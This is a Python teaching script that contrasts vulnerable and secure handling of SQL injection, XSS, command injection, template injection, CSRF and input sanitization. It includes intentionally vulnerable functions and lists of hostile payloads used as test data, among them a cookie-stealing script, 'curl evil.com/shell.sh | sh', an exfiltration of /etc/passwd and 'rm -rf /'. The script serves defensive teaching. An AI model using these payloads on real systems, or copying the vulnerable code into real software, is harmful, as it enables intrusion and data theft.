1"""
2Injection Attack Prevention Demo
3================================
4
5Educational demonstration of injection vulnerabilities and their defenses:
6- SQL Injection: vulnerable vs parameterized (sqlite3 in-memory)
7- XSS: encoding/escaping with html.escape
8- Command Injection: vulnerable os.system vs safe subprocess
9- Template Injection: why f-strings in templates are dangerous
10- CSRF token generation and validation
11- Input sanitization utilities
12
13All examples are DEFENSIVE - demonstrating how to identify and
14prevent injection attacks. Uses only Python standard library.
15"""
16
17import html
18import hashlib
19import hmac
20import json
21import os
22import re
23import secrets
24import shlex
25import sqlite3
26import subprocess
27import time
28from urllib.parse import quote as url_quote
29
30print("=" * 65)
31print(" Injection Attack Prevention Demo")
32print("=" * 65)
33print()
34
35
36# ============================================================
37# Section 1: SQL Injection - In Depth
38# ============================================================
39
40print("-" * 65)
41print(" Section 1: SQL Injection Prevention")
42print("-" * 65)
43
44# Setup database
45conn = sqlite3.connect(":memory:")
46cur = conn.cursor()
47cur.execute("""
48 CREATE TABLE products (
49 id INTEGER PRIMARY KEY,
50 name TEXT,
51 price REAL,
52 category TEXT
53 )
54""")
55cur.executemany(
56 "INSERT INTO products (name, price, category) VALUES (?, ?, ?)",
57 [
58 ("Laptop", 999.99, "electronics"),
59 ("Mouse", 29.99, "electronics"),
60 ("Desk Chair", 299.99, "furniture"),
61 ("Notebook", 4.99, "stationery"),
62 ("Monitor", 449.99, "electronics"),
63 ],
64)
65
66cur.execute("""
67 CREATE TABLE admin_settings (
68 key TEXT PRIMARY KEY,
69 value TEXT
70 )
71""")
72cur.execute(
73 "INSERT INTO admin_settings VALUES (?, ?)",
74 ("secret_key", "SUPER_SECRET_ADMIN_KEY_12345"),
75)
76conn.commit()
77
78print("""
79 SQL Injection Types:
80 1. Classic: ' OR '1'='1
81 2. UNION-based: ' UNION SELECT ... --
82 3. Blind: AND 1=1 (boolean) or AND SLEEP(5) (time-based)
83 4. Second-order: stored payload executed later
84""")
85
86# --- Classic SQL Injection ---
87print(" -- Classic SQL Injection --")
88
89
90def search_products_vulnerable(category: str) -> list:
91 """VULNERABLE: User input directly in SQL."""
92 query = f"SELECT name, price FROM products WHERE category = '{category}'"
93 return cur.execute(query).fetchall()
94
95
96def search_products_secure(category: str) -> list:
97 """SECURE: Parameterized query."""
98 return cur.execute(
99 "SELECT name, price FROM products WHERE category = ?",
100 (category,),
101 ).fetchall()
102
103
104# Normal usage
105print(f"\n Normal search: category='electronics'")
106results = search_products_secure("electronics")
107for name, price in results:
108 print(f" {name}: ${price}")
109print()
110
111# UNION-based injection: extract data from other tables
112union_payload = "' UNION SELECT key, value FROM admin_settings --"
113print(f" UNION injection payload: {union_payload}")
114
115print(" -- Vulnerable --")
116try:
117 results = search_products_vulnerable(union_payload)
118 for name, price in results:
119 print(f" {name}: {price}")
120 print(" ^^ Admin secret key leaked!")
121except Exception as e:
122 print(f" Error: {e}")
123
124print(" -- Secure --")
125results = search_products_secure(union_payload)
126print(f" Results: {results} (empty - injection treated as literal string)")
127print()
128
129# --- Blind SQL Injection ---
130print(" -- Blind SQL Injection Concept --")
131print("""
132 Blind injection infers data through true/false responses:
133
134 Payload: electronics' AND (SELECT length(value) FROM admin_settings
135 WHERE key='secret_key') > 10 --
136
137 If results are returned -> condition is true -> length > 10
138 If no results -> condition is false -> length <= 10
139
140 Attacker narrows down character by character.
141 Defense: ALWAYS use parameterized queries.
142""")
143
144# --- Second-order injection ---
145print(" -- Second-Order Injection --")
146print("""
147 Stored payload that triggers on a later query:
148
149 Step 1: Register username = "admin'--"
150 Step 2: Password reset uses:
151 UPDATE users SET password = ? WHERE username = '<stored_name>'
152 Becomes: WHERE username = 'admin'--' (updates admin's password!)
153
154 Defense: Parameterize ALL queries, even with "trusted" DB data.
155""")
156print()
157
158
159# ============================================================
160# Section 2: XSS (Cross-Site Scripting) Prevention
161# ============================================================
162
163print("-" * 65)
164print(" Section 2: XSS Prevention")
165print("-" * 65)
166
167print("""
168 XSS Types:
169 1. Reflected: payload in URL/request, reflected in response
170 2. Stored: payload saved to DB, rendered to other users
171 3. DOM-based: payload manipulates client-side JavaScript
172""")
173
174
175def render_comment_vulnerable(username: str, comment: str) -> str:
176 """VULNERABLE: No escaping - XSS possible."""
177 return f"<div class='comment'><b>{username}</b>: {comment}</div>"
178
179
180def render_comment_secure(username: str, comment: str) -> str:
181 """SECURE: HTML-escaped output prevents XSS."""
182 safe_user = html.escape(username, quote=True)
183 safe_comment = html.escape(comment, quote=True)
184 return f"<div class='comment'><b>{safe_user}</b>: {safe_comment}</div>"
185
186
187# Normal content
188print("\n Normal comment:")
189normal_user = "Alice"
190normal_comment = "Great product! 5 stars."
191print(f" Secure: {render_comment_secure(normal_user, normal_comment)}")
192print()
193
194# XSS payloads
195xss_payloads = [
196 ("<script>alert('XSS')</script>", "Basic script injection"),
197 ('<img src=x onerror="alert(1)">', "Event handler injection"),
198 ('"><script>document.location="http://evil.com/?c="+document.cookie</script>',
199 "Cookie theft"),
200 ("javascript:alert(1)", "JavaScript URI"),
201 ('<svg onload="alert(1)">', "SVG event handler"),
202]
203
204print(" XSS Payload Escaping:")
205for payload, desc in xss_payloads:
206 escaped = html.escape(payload, quote=True)
207 print(f"\n Attack: {desc}")
208 print(f" Raw: {payload[:60]}")
209 print(f" Escaped: {escaped[:60]}")
210print()
211
212# Context-specific encoding
213print(" -- Context-Specific Encoding --")
214
215
216def encode_for_html_attr(value: str) -> str:
217 """Encode for use in HTML attributes."""
218 return html.escape(value, quote=True)
219
220
221def encode_for_url(value: str) -> str:
222 """Encode for use in URLs."""
223 return url_quote(value, safe="")
224
225
226def encode_for_javascript(value: str) -> str:
227 """Encode for use in JavaScript string context."""
228 # Escape characters that could break out of a JS string
229 replacements = {
230 "\\": "\\\\", "'": "\\'", '"': '\\"',
231 "\n": "\\n", "\r": "\\r", "<": "\\x3c",
232 ">": "\\x3e", "&": "\\x26",
233 }
234 for old, new in replacements.items():
235 value = value.replace(old, new)
236 return value
237
238
239test_input = '<script>alert("xss")</script>'
240print(f" Input: {test_input}")
241print(f" HTML attr: {encode_for_html_attr(test_input)}")
242print(f" URL: {encode_for_url(test_input)}")
243print(f" JavaScript: {encode_for_javascript(test_input)}")
244print()
245
246
247# ============================================================
248# Section 3: Command Injection Prevention
249# ============================================================
250
251print("-" * 65)
252print(" Section 3: Command Injection Prevention")
253print("-" * 65)
254
255print("""
256 VULNERABLE: os.system(), subprocess with shell=True
257 SECURE: subprocess.run() with list args, shell=False
258""")
259
260
261def ping_host_vulnerable(host: str) -> str:
262 """
263 VULNERABLE: Command injection via os.system.
264 DO NOT use in production - shown for educational purposes only.
265 """
266 # An attacker could pass: "google.com; cat /etc/passwd"
267 command = f"echo '[SIMULATED] ping -c 1 {host}'"
268 return f" Constructed command: {command}"
269
270
271def ping_host_secure(host: str) -> str:
272 """SECURE: Using subprocess with argument list (no shell)."""
273 # Validate input first
274 if not re.match(r"^[a-zA-Z0-9.\-]+$", host):
275 return f" Invalid hostname: {host}"
276
277 # Use list form - no shell interpretation
278 cmd = ["echo", "[SIMULATED] ping", "-c", "1", host]
279 return f" Constructed command: {cmd}"
280
281
282# Normal input
283print("\n Normal input: 'google.com'")
284print(f" Vulnerable: {ping_host_vulnerable('google.com')}")
285print(f" Secure: {ping_host_secure('google.com')}")
286print()
287
288# Malicious input
289malicious = "google.com; cat /etc/passwd"
290print(f" Malicious input: '{malicious}'")
291print(f" Vulnerable: {ping_host_vulnerable(malicious)}")
292print(f" ^^ Shell interprets ';' as command separator!")
293print(f" Secure: {ping_host_secure(malicious)}")
294print()
295
296# Additional dangerous patterns
297print(" -- Dangerous Shell Patterns --")
298dangerous_inputs = [
299 ("$(whoami)", "Command substitution"),
300 ("`id`", "Backtick command substitution"),
301 ("| cat /etc/shadow", "Pipe injection"),
302 ("&& rm -rf /", "Command chaining"),
303 ("; curl http://evil.com/shell.sh | sh", "Remote code execution"),
304 ("$(curl evil.com/exfil?data=$(cat /etc/passwd))", "Data exfiltration"),
305]
306
307for payload, desc in dangerous_inputs:
308 validated = re.match(r"^[a-zA-Z0-9.\-]+$", payload) is not None
309 status = "PASS" if validated else "BLOCKED"
310 print(f" [{status}] {desc}")
311 print(f" Payload: {payload}")
312
313print()
314print(" Safe alternatives to shell commands:")
315print(" os.system() -> subprocess.run([...], shell=False)")
316print(" os.popen() -> subprocess.run([...], capture_output=True)")
317print(" shell=True -> shell=False with list arguments")
318print(" String commands -> shlex.split() or list construction")
319print()
320
321# shlex.quote for when shell=True is unavoidable
322print(" -- shlex.quote() for shell escaping --")
323user_filename = "my file; rm -rf /"
324safe_quoted = shlex.quote(user_filename)
325print(f" Raw input: {user_filename}")
326print(f" shlex.quote: {safe_quoted}")
327print(f" (Wraps in single quotes, escapes internal quotes)")
328print()
329
330
331# ============================================================
332# Section 4: Template Injection
333# ============================================================
334
335print("-" * 65)
336print(" Section 4: Template Injection Prevention")
337print("-" * 65)
338
339print("""
340 Server-Side Template Injection (SSTI) occurs when user input
341 is embedded directly into a template engine's template string.
342
343 In Python, even f-strings can be dangerous if used with
344 user-controlled format strings.
345""")
346
347# --- Dangerous: f-string with user input ---
348print(" -- Dangerous: User-Controlled Format Strings --")
349
350
351def render_greeting_vulnerable(template_str: str, name: str) -> str:
352 """
353 VULNERABLE: User controls the template string.
354 An attacker could access object attributes.
355 """
356 # This is dangerous - user controls template_str
357 try:
358 return template_str.format(name=name, greeting="Hello")
359 except (KeyError, AttributeError, IndexError) as e:
360 return f"Error: {e}"
361
362
363def render_greeting_secure(name: str) -> str:
364 """SECURE: Template is hardcoded, only data varies."""
365 safe_name = html.escape(name)
366 return f"Hello, {safe_name}! Welcome back."
367
368
369# Normal usage
370print(f"\n Normal: {render_greeting_secure('Alice')}")
371
372# Malicious template strings
373malicious_templates = [
374 ("{name.__class__.__mro__}", "Access class hierarchy"),
375 ("{name.__class__.__init__.__globals__}", "Access global variables"),
376 ("{greeting} {name} - {0}", "Positional argument access"),
377]
378
379print("\n Template injection attempts (format string):")
380for template, desc in malicious_templates:
381 result = render_greeting_vulnerable(template, "Alice")
382 truncated = str(result)[:60]
383 print(f" {desc}:")
384 print(f" Template: {template}")
385 print(f" Result: {truncated}...")
386print()
387
388print(" Prevention:")
389print(" 1. Never let users control template strings")
390print(" 2. Use proper template engines with auto-escaping (Jinja2)")
391print(" 3. Use sandboxed template environments")
392print(" 4. Validate and sanitize all interpolated values")
393print()
394
395
396# ============================================================
397# Section 5: CSRF Token Generation and Validation
398# ============================================================
399
400print("-" * 65)
401print(" Section 5: CSRF (Cross-Site Request Forgery) Protection")
402print("-" * 65)
403
404print("""
405 CSRF tricks a user's browser into making unwanted requests
406 to a site where they're authenticated.
407
408 Defense: Include a secret token in forms that the attacker
409 cannot know or predict.
410""")
411
412
413class CSRFProtection:
414 """CSRF token generation and validation."""
415
416 def __init__(self, secret_key: str):
417 self.secret_key = secret_key.encode()
418
419 def generate_token(self, session_id: str) -> str:
420 """Generate a CSRF token tied to a user's session."""
421 # Token = HMAC(secret, session_id + timestamp)
422 timestamp = str(int(time.time()))
423 message = f"{session_id}:{timestamp}".encode()
424 signature = hmac.new(self.secret_key, message, hashlib.sha256).hexdigest()
425 # Token format: timestamp:signature
426 return f"{timestamp}:{signature}"
427
428 def validate_token(self, token: str, session_id: str,
429 max_age: int = 3600) -> tuple[bool, str]:
430 """Validate a CSRF token."""
431 try:
432 parts = token.split(":")
433 if len(parts) != 2:
434 return False, "Invalid token format"
435
436 timestamp_str, signature = parts
437 timestamp = int(timestamp_str)
438
439 # Check expiration
440 if time.time() - timestamp > max_age:
441 return False, "Token expired"
442
443 # Recompute and compare
444 message = f"{session_id}:{timestamp_str}".encode()
445 expected = hmac.new(
446 self.secret_key, message, hashlib.sha256
447 ).hexdigest()
448
449 if hmac.compare_digest(signature, expected):
450 return True, "Valid"
451 return False, "Invalid signature"
452
453 except (ValueError, TypeError) as e:
454 return False, f"Validation error: {e}"
455
456
457csrf = CSRFProtection("my-app-secret-key")
458session_id = "sess_abc123"
459
460# Generate token
461token = csrf.generate_token(session_id)
462print(f"\n Session ID: {session_id}")
463print(f" CSRF Token: {token}")
464print()
465
466# Validate valid token
467valid, msg = csrf.validate_token(token, session_id)
468print(f" Valid token: {valid} ({msg})")
469
470# Validate with different session
471valid, msg = csrf.validate_token(token, "sess_different")
472print(f" Wrong session: {valid} ({msg})")
473
474# Validate tampered token
475tampered = token[:-5] + "XXXXX"
476valid, msg = csrf.validate_token(tampered, session_id)
477print(f" Tampered token: {valid} ({msg})")
478print()
479
480# HTML form example
481print(" HTML form with CSRF token:")
482print(f""" <form method="POST" action="/transfer">
483 <input type="hidden" name="csrf_token" value="{token}">
484 <input type="text" name="amount" value="100">
485 <button type="submit">Transfer</button>
486 </form>
487""")
488
489print(" CSRF Prevention Checklist:")
490print(" 1. Include CSRF token in all state-changing forms")
491print(" 2. Validate token server-side on every POST/PUT/DELETE")
492print(" 3. Use SameSite=Lax or Strict cookies")
493print(" 4. Verify Origin/Referer headers as additional check")
494print(" 5. Use framework-provided CSRF protection (e.g., Flask-WTF)")
495print()
496
497
498# ============================================================
499# Section 6: Input Sanitization Utilities
500# ============================================================
501
502print("-" * 65)
503print(" Section 6: Input Sanitization Utilities")
504print("-" * 65)
505
506
507class Sanitizer:
508 """Collection of input sanitization methods."""
509
510 @staticmethod
511 def sanitize_html(text: str) -> str:
512 """Remove all HTML tags, keep text content."""
513 # Remove tags
514 clean = re.sub(r"<[^>]+>", "", text)
515 # Decode common entities
516 clean = html.unescape(clean)
517 # Remove null bytes
518 clean = clean.replace("\x00", "")
519 return clean.strip()
520
521 @staticmethod
522 def sanitize_filename(filename: str) -> str:
523 """Sanitize a filename to prevent path traversal."""
524 # Remove path separators
525 filename = os.path.basename(filename)
526 # Remove null bytes
527 filename = filename.replace("\x00", "")
528 # Remove dangerous characters
529 filename = re.sub(r'[<>:"/\\|?*]', "_", filename)
530 # Remove leading dots (hidden files)
531 filename = filename.lstrip(".")
532 # Limit length
533 name, ext = os.path.splitext(filename)
534 if len(name) > 200:
535 name = name[:200]
536 return name + ext if filename else "unnamed"
537
538 @staticmethod
539 def sanitize_sql_identifier(identifier: str) -> str:
540 """Sanitize a SQL identifier (table/column name).
541 For identifiers ONLY - use parameterized queries for values."""
542 # Allow only alphanumeric and underscore
543 if not re.match(r"^[a-zA-Z_][a-zA-Z0-9_]*$", identifier):
544 raise ValueError(f"Invalid SQL identifier: {identifier}")
545 # Check against reserved words (subset)
546 reserved = {"SELECT", "INSERT", "UPDATE", "DELETE", "DROP", "TABLE",
547 "FROM", "WHERE", "AND", "OR", "UNION", "JOIN"}
548 if identifier.upper() in reserved:
549 raise ValueError(f"SQL reserved word: {identifier}")
550 return identifier
551
552 @staticmethod
553 def sanitize_log_entry(text: str) -> str:
554 """Sanitize text for safe logging (prevent log injection)."""
555 # Remove newlines (prevent log forging)
556 text = text.replace("\n", " ").replace("\r", " ")
557 # Remove ANSI escape codes
558 text = re.sub(r"\x1b\[[0-9;]*m", "", text)
559 # Limit length
560 return text[:500]
561
562
563sanitizer = Sanitizer()
564
565# HTML sanitization
566print("\n -- HTML Sanitization --")
567html_tests = [
568 '<p>Hello <b>World</b></p>',
569 '<script>alert("XSS")</script>Normal text',
570 '<img src="x" onerror="steal()">Photo',
571 '<a href="javascript:void(0)">Click</a>',
572]
573for test in html_tests:
574 clean = sanitizer.sanitize_html(test)
575 print(f" Input: {test[:50]}")
576 print(f" Clean: {clean}")
577 print()
578
579# Filename sanitization
580print(" -- Filename Sanitization --")
581filename_tests = [
582 "normal_file.txt",
583 "../../../etc/passwd",
584 "file\x00.txt.exe",
585 '<script>alert("xss")</script>.html',
586 "...hidden_file.txt",
587 "CON.txt", # Windows reserved name
588]
589for test in filename_tests:
590 clean = sanitizer.sanitize_filename(test)
591 print(f" Input: {test!r:<40} -> {clean}")
592print()
593
594# SQL identifier sanitization
595print(" -- SQL Identifier Sanitization --")
596identifier_tests = [
597 "users",
598 "user_name",
599 "1invalid",
600 "DROP",
601 "valid_table_123",
602 "table; DROP TABLE users--",
603]
604for test in identifier_tests:
605 try:
606 clean = sanitizer.sanitize_sql_identifier(test)
607 print(f" [{' OK '}] {test:<35} -> {clean}")
608 except ValueError as e:
609 print(f" [BLOCK] {test:<35} -> {e}")
610print()
611
612# Log injection prevention
613print(" -- Log Injection Prevention --")
614log_tests = [
615 "Normal log entry",
616 "Fake entry\n2024-01-01 [INFO] Admin logged in",
617 "Data with \x1b[31mANSI colors\x1b[0m",
618]
619for test in log_tests:
620 clean = sanitizer.sanitize_log_entry(test)
621 print(f" Input: {test!r}")
622 print(f" Clean: {clean!r}")
623 print()
624
625
626# ============================================================
627# Section 7: Summary
628# ============================================================
629
630print("=" * 65)
631print(" Injection Prevention Summary")
632print("=" * 65)
633print("""
634 Attack Type | Primary Defense | Secondary Defense
635 ---------------+---------------------------+----------------------
636 SQL Injection | Parameterized queries | Input validation, WAF
637 XSS | Output encoding/escaping | CSP headers, sanitize
638 Command Inj. | Avoid shell, use lists | Input allowlist, shlex
639 Template Inj. | Fixed templates, sandbox | Auto-escaping engine
640 CSRF | Anti-CSRF tokens | SameSite cookies
641 Path Traversal | basename(), allowlist | Chroot, sandboxing
642 Log Injection | Strip newlines/ANSI | Structured logging
643
644 Universal Principles:
645 1. Never trust user input
646 2. Validate input (allowlist > blocklist)
647 3. Encode/escape output for the target context
648 4. Use parameterized APIs (not string concatenation)
649 5. Apply defense in depth (multiple layers)
650 6. Keep dependencies updated
651 7. Use security linters (bandit, semgrep)
652""")
653
654# Cleanup
655conn.close()